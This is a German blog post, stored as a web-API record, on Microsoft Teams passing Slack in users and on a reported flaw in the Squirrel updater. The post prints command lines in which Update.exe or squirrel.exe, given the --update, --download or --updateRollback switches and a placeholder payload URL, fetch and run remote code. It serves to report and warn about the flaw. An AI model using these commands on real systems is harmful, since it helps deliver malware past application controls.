{"id":220538,"date":"2019-07-15T00:13:00","date_gmt":"2019-07-14T22:13:00","guid":{"rendered":"https:\/\/www.borncity.com\/blog\/?p=220538"},"modified":"2020-01-19T23:57:50","modified_gmt":"2020-01-19T22:57:50","slug":"teams-erfolgreich-aber-ein-sicherheits-gau","status":"publish","type":"post","link":"https:\/\/borncity.com\/blog\/2019\/07\/15\/teams-erfolgreich-aber-ein-sicherheits-gau\/","title":{"rendered":"Teams: Erfolgreich, aber ein Sicherheits-GAU"},"content":{"rendered":"

Microsofts Teams hat gerade Slack in den Nutzerzahlen \u00fcberholt. Das wird nun weltweit in Blogs und IT-Magazinen abgefeiert. Aber das Produkt hat auch seine Schattenseiten, sicherheitstechnisch hat Microsoft mal wieder einen GAU verbrochen.<\/p>\n

<\/p>\n

Teams \u00fcberholt Slack<\/h2>\n

\"\"Teams ist, wie Slack, ein Collaborations-Werkzeug, in dem Menschen im Gesch\u00e4ftsumfeld kommunizieren k\u00f6nnen (Chat, Besprechungen, Notizen etc.). Teams wird inzwischen mit Microsoft Office365 ausgeliefert. Mittelfristig soll Teams sogar Microsoft Skype (fr\u00fcher Lync) ersetzen (siehe Microsoft ersetzt Skype for Business durch Teams<\/a>). Und Teams hat inzwischen 13 Millionen Nutzer t\u00e4glich, mehr als der Konkurrent Slack. Heise hat sich beispielsweise in diesem Artikel<\/a> am Thema abgearbeitet. Sch\u00f6ne neue Welt \u2026<\/p>\n

Teams kann zum Malware-Download benutzt werden<\/h2>\n

Es ist bereits einige Tage her, dass ich auf diesen Artikel<\/a> von Bleeping Computer gesto\u00dfen bin. Da klingelte sofort was bei mir \u2013 dazu sp\u00e4ter mehr. Der Artikel bei Bleeping Computer adressiert den Umstand, dass die Update-Funktion von Teams in der Desktop-Anwendung das Herunterladen und Ausf\u00fchren beliebiger Dateien auf dem System erm\u00f6glicht.<\/p>\n

Das gleiche Problem betrifft \u00fcbrigens auch die Updater der Clients von GitHub, WhatApp und UiPath Software f\u00fcr Desktop-Computer.<\/p><\/blockquote>\n

Diese Anwendungen basieren alle auf dem Open-Source-Projekt Squirrel<\/a> zur Verwaltung von Installations- und Aktualisierungsroutinen, das mit dem NuGet-Paketmanager<\/a> die notwendigen Dateien erstellt. Auch da klingelte was bei mir.<\/p>\n

Mehrere Sicherheitsforscher weisen aber darauf hin, dass es mit dem Befehl \"update\" m\u00f6glich ist, eine beliebige Bin\u00e4rdatei im Kontext des aktuellen Benutzers auszuf\u00fchren. Das Gleiche gilt f\u00fcr \"squirrel.exe<\/em>\". Mit Microsoft Teams l\u00e4sst eine Malware als Payload von einer Webserver herunterladen, in einen Ordner speichern, und automatisch mit einem der folgenden Befehle ausf\u00fchren:<\/p>\n

Update.exe --update [url to payload]\r\nsquirrel.exe --update [url to payload]<\/code><\/pre>\n
Die Befehle k\u00f6nnen mit anderen Argumenten verwendet werden, was den download einer Nutzlast in Form eines NuGet-Pakets von einem Remote-Standort aus erm\u00f6glicht.<\/p>\n
Update.exe --download [url to payload]\r\nsquirrel.exe --download [url to payload]<\/code><\/pre>\n
Oder die folgenden Befehl werden verwendet, um Schadsoftware remote herunterzuladen und auszuf\u00fchren:<\/p>\n
Update.exe --updateRollback [url to payload]\r\nsquirrel.exe --updateRollback [url to payload]<\/code><\/pre>\n
Sicherheitsforscher Reegun Richard<\/a> hat das Problem in Microsoft Teams am 4. Juni an Microsoft gemeldet.<\/p>\n
\n
Found another vulnerable parameter where Microsoft Teams do remote download and execute.<\/p>\n
Vulnerable parameter :
\nupdate.exe –updateRollback=URL to package
\nsquirrel.exe –updateRollback=URL to packagehttps:\/\/t.co\/4oFCyXkfxa<\/a><\/p>\n
CC:@MrUn1k0d3r<\/a> @Hexacorn<\/a> @Oddvarmoe<\/a> #blueteam<\/a> #redteam<\/a><\/p>\n
\u2014 Reegun (@reegun21) 1. Juli 2019<\/a><\/p><\/blockquote>\n